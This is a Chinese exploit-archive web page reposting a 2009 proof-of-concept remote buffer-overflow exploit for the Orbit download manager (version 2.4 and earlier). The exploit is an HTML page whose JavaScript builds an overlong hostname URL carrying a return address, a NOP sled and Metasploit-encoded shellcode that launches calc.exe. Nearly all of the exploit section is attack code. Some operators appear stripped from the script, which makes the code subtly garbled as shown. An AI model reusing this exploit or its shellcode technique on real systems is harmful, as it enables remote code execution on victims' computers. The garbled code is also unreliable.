首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Orbit <= 2.4 Long Hostname Remote Buffer Overflow Exploit


(略)
<html>
<body>

Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc<br />
Vulnerability discovered by Secunia<br />
Exploit and POC provided by: JavaGuru<br />
<br />
Right click on link below then choose download by orbit, CALC.EXE will pop up<br />
<br />
I got a lot of problems when trying to execute shellcode, because a lot of chars<br />
was forbidden and I was not able to execute shellcode.<br />
After playing a little I found out the solution.<br />
<br />
Don't forget, open this HTML in Firefox
<br />
Check it out.<br />
<br />
Any questions/comments: JavaGuru1999@yahoo.de<br />
<br />
<script language="JavaScript">
var tmp = "http://";

for (i=0;i<508;i ) tmp ="o";

// jmp esp from kernel32.dll XP SP 3 English
//
tmp = "{F?|";

// some nops
tmp = "????";

// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp = "?YYYY?YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY?????7IIIIIIIIIIIIIIIIIQZjgXP0B1ABkBAw2BB2AA0AAXBP8BBum9IlKX74C030wpnksuUlnkalfePxTAJOlKboVxLKQOEpUQzK1Ynk6TLKS1jNEaO0Z9LlndIP44UWjaKzfm5QkrjKl4UkADDdvdsEZELKsoWTGqjK0flKtL0KlKSo7lGqZKnkwllK4AJKK9QLDdTDzc7AO0AtlKCpvPLEO00xfllK70dLlK0peLlmLKCX6hxkuYnkopNPUPUPUPNku8UlCoFQyfcPpVLIl8k3o0ak2pqxankhzBCCqxZ8kNmZvnpWiom7rCU10lpcvNperXPes0g";

// Filename (not important)
tmp = "/a.rar";

// Write link for download for orbit!
document.write ('<a href="' tmp '">Right click, then choose download with orbit</a>');


</script>
</body>
</html>

[2009-02-27]
<< Multiple PDF Readers JBIG2 Local Buffer Overflow PoC POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH) >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8